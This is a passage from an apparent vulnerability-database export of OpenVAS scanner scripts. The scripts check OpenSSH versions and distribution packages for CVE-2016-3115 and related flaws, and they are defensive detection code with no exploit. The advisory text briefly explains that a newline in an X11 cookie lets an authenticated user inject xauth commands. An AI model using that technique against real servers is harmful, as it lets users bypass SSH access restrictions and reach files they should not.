script_oid(\"1.3.6.1.4.1.25623.1.0.105581\");\n script_version(\"2020-03-06T09:16:18+0000\");\n script_cve_id(\"CVE-2016-3115\");\n script_tag(name:\"cvss_base\", value:\"5.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:P/I:P/A:N\");\n script_tag(name:\"last_modification\", value:\"2020-03-06 09:16:18 +0000 (Fri, 06 Mar 2020)\");\n script_tag(name:\"creation_date\", value:\"2016-03-21 11:45:13 +0100 (Mon, 21 Mar 2016)\");\n script_name(\"OpenSSH <= 7.2p1 - Xauth Injection\");\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"General\");\n script_dependencies(\"gb_openssh_consolidation.nasl\");\n script_mandatory_keys(\"openssh/detected\");\n\n script_xref(name:\"URL\", value:\"http://www.openssh.com/txt/release-7.2p2\");\n\n script_tag(name:\"summary\", value:\"openssh xauth command injection may lead to forced-command and\n /bin/false bypass\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"An authenticated user may inject arbitrary xauth commands by sending an\n x11 channel request that includes a newline character in the x11 cookie. The newline acts as a command\n separator to the xauth binary. This attack requires the server to have 'X11Forwarding yes' enabled.\n Disabling it, mitigates this vector.\");\n\n script_tag(name:\"impact\", value:\"By injecting xauth commands one gains limited* read/write arbitrary files,\n information leakage or xauth-connect capabilities.\");\n\n script_tag(name:\"affected\", value:\"OpenSSH versions before 7.2p2.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to OpenSSH version 7.2p2 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif( isnull( port = get_app_port( cpe:CPE ) ) )\n exit( 0 );\n\nif( ! infos = get_app_version_and_location( cpe:CPE, port:port, exit_no_version:TRUE ) )\n exit( 0 );\n\nvers = infos[\"version\"];\npath = infos[\"location\"];\n\nif( vers =~ \"^[0-6]\\.\" || vers =~ \"^7\\.[01]($|[^0-9])\" || vers =~ \"^7.2($|p1)\" ) {\n report = report_fixed_ver( installed_version:vers, fixed_version:\"7.2p2\", install_path:path );\n security_message( port:port, data:report );\n exit( 0 );\n}\n\nexit( 99 );", "cvss": {"score": 5.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:N"}}, {"lastseen": "2019-05-29T18:35:34", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3115"], "description": "Mageia Linux Local Security Checks mgasa-2016-0108", "modified": "2019-03-14T00:00:00", "published": "2016-03-14T00:00:00", "id": "OPENVAS:1361412562310131265", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310131265", "type": "openvas", "title": "Mageia Linux Local Check: mgasa-2016-0108", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: mgasa-2016-0108.nasl 14180 2019-03-14 12:29:16Z cfischer $\n#\n# Mageia Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2016 Eero Volotinen, http://www.solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.131265\");\n script_version(\"$Revision: 14180 $\");\n script_tag(name:\"creation_date\", value:\"2016-03-14 15:57:15 +0200 (Mon, 14 Mar 2016)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-14 13:29:16 +0100 (Thu, 14 Mar 2019) $\");\n script_name(\"Mageia Linux Local Check: mgasa-2016-0108\");\n script_tag(name:\"insight\", value:\"Missing sanitisation of untrusted input allows an authenticated user who is able to request X11 forwarding to inject commands to xauth(1) (CVE-2016-3115).\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://advisories.mageia.org/MGASA-2016-0108.html\");\n script_cve_id(\"CVE-2016-3115\");\n script_tag(name:\"cvss_base\", value:\"5.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:P/I:P/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mageia_linux\", \"ssh/login/release\", re:\"ssh/login/release=MAGEIA5\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Mageia Linux Local Security Checks mgasa-2016-0108\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Mageia Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"MAGEIA5\")\n{\nif ((res = isrpmvuln(pkg:\"openssh\", rpm:\"openssh~6.6p1~5.7.mga5\", rls:\"MAGEIA5\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:N"}}, {"lastseen": "2020-01-27T18:37:06", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-1908", "CVE-2016-3115"], "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-01-23T00:00:00", "published": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220161008", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220161008", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for openssh (EulerOS-SA-2016-1008)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2016.1008\");\n script_version(\"2020-01-23T10:37:23+0000\");\n script_cve_id(\"CVE-2016-1908\", \"CVE-2016-3115\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 10:37:23 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 10:37:23 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for openssh (EulerOS-SA-2016-1008)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP1\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2016-1008\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2016-1008\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'openssh' package(s) announced via the EulerOS-SA-2016-1008 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"It was discovered that the OpenSSH server did not sanitize data received in requests to enable X11 forwarding. An authenticated client with restricted SSH access could possibly use this flaw to bypass intended restrictions. (CVE-2016-3115)\n\nAn access flaw was discovered in OpenSSH, the OpenSSH client did not correctly handle failures to generate authentication cookies for untrusted X11 forwarding. A malicious or compromised remote X application could possibly use this flaw to establish a trusted connection to the local X server, even if only untrusted X11 forwarding was requested. (CVE-2016-1908)\");\n\n script_tag(name:\"affected\", value:\"'openssh' package(s) on Huawei EulerOS V2.0SP1.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP1\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"openssh\", rpm:\"openssh~6.6.1p1~25.4.h3\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"openssh-askpass\", rpm:\"openssh-askpass~6.6.1p1~25.4.h3\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"openssh-clients\", rpm:\"openssh-clients~6.6.1p1~25.4.h3\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"openssh-keycat\", rpm:\"openssh-keycat~6.6.1p1~25.4.h3\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"openssh-server\", rpm:\"openssh-server~6.6.1p1~25.4.h3\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:35:13", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-1908", "CVE-2016-3115"], "description": "Check the version of openssh", "modified": "2019-03-08T00:00:00", "published": "2016-03-22T00:00:00", "id": "OPENVAS:1361412562310882432", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882432", "type": "openvas", "title": "CentOS Update for openssh CESA-2016:0465 centos7", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for openssh CESA-2016:0465 centos7\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882432\");\n script_version(\"$Revision: 14058 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-08 14:25:52 +0100 (Fri, 08 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-03-22 06:12:50 +0100 (Tue, 22 Mar 2016)\");\n script_cve_id(\"CVE-2016-1908\", \"CVE-2016-3115\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"CentOS Update for openssh CESA-2016:0465 centos7\");\n script_tag(name:\"summary\", value:\"Check the version of openssh\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"OpenSSH is OpenBSD's SSH (Secure Shell)\nprotocol implementation. These packages include the core files necessary for\nboth the OpenSSH client and server.\n\nIt was discovered that the OpenSSH server did not sanitize data received\nin requests to enable X11 forwarding. An authenticated client with\nrestricted SSH access could possibly use this flaw to bypass intended\nrestrictions. (CVE-2016-3115)\n\nAn access flaw was discovered in OpenSSH the OpenSSH client did not\ncorrectly handle failures to generate authentication cookies for untrusted\nX11 forwarding. A malicious or compromised remote X application could\npossibly use this flaw to establish a trusted connection to the local X\nserver, even if only untrusted X11 forwarding was requested.\n(CVE-2016-1908)\n\nAll openssh users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing this\nupdate, the OpenSSH server daemon (sshd) will be restarted automatically.\");\n script_tag(name:\"affected\", value:\"openssh on CentOS 7\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"CESA\", value:\"2016:0465\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2016-March/021746.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS7\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS7\")\n{\n\n if ((res = isrpmvuln(pkg:\"openssh\", rpm:\"openssh~6.6.1p1~25.el7_2\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssh-askpass\", rpm:\"openssh-askpass~6.6.1p1~25.el7_2\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssh-clients\", rpm:\"openssh-clients~6.6.1p1~25.el7_2\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssh-keycat\", rpm:\"openssh-keycat~6.6.1p1~25.el7_2\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssh-ldap\", rpm:\"openssh-ldap~6.6.1p1~25.el7_2\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssh-server\", rpm:\"openssh-server~6.6.1p1~25.el7_2\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssh-server-sysvinit\", rpm:\"openssh-server-sysvinit~6.6.1p1~25.el7_2\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"pam_ssh_agent_auth\", rpm:\"pam_ssh_agent_auth~0.9.3~9.25.el7_2\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:35:07", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-1908", "CVE-2016-3115"], "description": "The remote host is missing an update for the ", "modified": "2018-11-23T00:00:00", "published": "2016-03-22T00:00:00", "id": "OPENVAS:1361412562310871580", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871580", "type": "openvas", "title": "RedHat Update for openssh RHSA-2016:0465-01", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for openssh RHSA-2016:0465-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871580\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2016-03-22 06:12:30 +0100 (Tue, 22 Mar 2016)\");\n script_cve_id(\"CVE-2016-1908\", \"CVE-2016-3115\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"RedHat Update for openssh RHSA-2016:0465-01\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'openssh'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"OpenSSH is OpenBSD's SSH (Secure Shell)\nprotocol implementation. These packages include the core files necessary for both\nthe OpenSSH client and server.\n\nIt was discovered that the OpenSSH server did not sanitize data received\nin requests to enable X11 forwarding. An authenticated client with\nrestricted SSH access could possibly use this flaw to bypass intended\nrestrictions. (CVE-2016-3115)\n\nAn access flaw was discovered in OpenSSH the OpenSSH client did not\ncorrectly handle failures to generate authentication cookies for untrusted\nX11 forwarding. A malicious or compromised remote X application could\npossibly use this flaw to establish a trusted connection to the local X\nserver, even if only untrusted X11 forwarding was requested.\n(CVE-2016-1908)\n\nAll openssh users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing this\nupdate, the OpenSSH server daemon (sshd) will be restarted automatically.\");\n script_tag(name:\"affected\", value:\"openssh on Red Hat Enterprise Linux Server (v. 7)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"RHSA\", value:\"2016:0465-01\");\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2016-March/msg00052.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_7\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_7\")\n{\n\n if ((res = isrpmvuln(pkg:\"openssh\", rpm:\"openssh~6.6.1p1~25.el7_2\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssh-askpass\", rpm:\"openssh-askpass~6.6.1p1~25.el7_2\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssh-clients\", rpm:\"openssh-clients~6.6.1p1~25.el7_2\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssh-debuginfo\", rpm:\"openssh-debuginfo~6.6.1p1~25.el7_2\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssh-keycat\", rpm:\"openssh-keycat~6.6.1p1~25.el7_2\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssh-server\", rpm:\"openssh-server~6.6.1p1~25.el7_2\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:35:49", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-5600", "CVE-2016-3115"], "description": "Oracle Linux Local Security Checks ELSA-2016-3531", "modified": "2019-03-14T00:00:00", "published": "2016-04-06T00:00:00", "id": "OPENVAS:1361412562310122921", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310122921", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2016-3531", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2016-3531.nasl 14180 2019-03-14 12:29:16Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.fi>\n#\n# Copyright:\n# Copyright (c) 2016 Eero Volotinen, http://solinor.fi\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.122921\");\n script_version(\"$Revision: 14180 $\");\n script_tag(name:\"creation_date\", value:\"2016-04-06 14:33:00 +0300 (Wed, 06 Apr 2016)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-14 13:29:16 +0100 (Thu, 14 Mar 2019) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2016-3531\");\n script_tag(name:\"insight\", value:\"ELSA-2016-3531 - openssh security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2016-3531\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2016-3531.html\");\n script_cve_id(\"CVE-2015-5600\", \"CVE-2016-3115\");\n script_tag(name:\"cvss_base\", value:\"8.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux5\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux5\")\n{\n if ((res = isrpmvuln(pkg:\"openssh\", rpm:\"openssh~4.3p2~82.0.2.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"openssh-askpass\", rpm:\"openssh-askpass~4.3p2~82.0.2.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"openssh-clients\", rpm:\"openssh-clients~4.3p2~82.0.2.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"openssh-server\", rpm:\"openssh-server~4.3p2~82.0.2.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:C"}}, {"lastseen": "2019-05-29T18:35:31", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-5600", "CVE-2016-3115"], "description": "The remote host is missing an update for the ", "modified": "2018-11-23T00:00:00", "published": "2016-03-22T00:00:00", "id": "OPENVAS:1361412562310871579", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871579", "type": "openvas", "title": "RedHat Update for openssh RHSA-2016:0466-01", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for openssh RHSA-2016:0466-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871579\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2016-03-22 06:12:28 +0100 (Tue, 22 Mar 2016)\");\n script_cve_id(\"CVE-2015-5600\", \"CVE-2016-3115\");\n script_tag(name:\"cvss_base\", value:\"8.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"RedHat Update for openssh RHSA-2016:0466-01\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'openssh'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"OpenSSH is OpenBSD's SSH (Secure Shell)\nprotocol implementation. These packages include the core files necessary for both\nthe OpenSSH client and server.\n\nIt was discovered that the OpenSSH server did not sanitize data received\nin requests to enable X11 forwarding. An authenticated client with\nrestricted SSH access could possibly use this flaw to bypass intended\nrestrictions. (CVE-2016-3115)\n\nIt was discovered that the OpenSSH sshd daemon did not check the list of\nkeyboard-interactive authentication methods for duplicates. A remote\nattacker could use this flaw to bypass the MaxAuthTries limit, making it\neasier to perform password guessing attacks. (CVE-2015-5600)\n\nAll openssh users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing this\nupdate, the OpenSSH server daemon (sshd) will be restarted automatically.\");\n script_tag(name:\"affected\", value:\"openssh on Red Hat Enterprise Linux Desktop (v. 6),\n Red Hat Enterprise Linux Server (v. 6),\n Red Hat Enterprise Linux Workstation (v. 6)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"RHSA\", value:\"2016:0466-01\");\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2016-March/msg00053.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_6\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"openssh\", rpm:\"openssh~5.3p1~114.el6_7\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssh-askpass\", rpm:\"openssh-askpass~5.3p1~114.el6_7\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssh-clients\", rpm:\"openssh-clients~5.3p1~114.el6_7\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssh-debuginfo\", rpm:\"openssh-debuginfo~5.3p1~114.el6_7\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssh-server\", 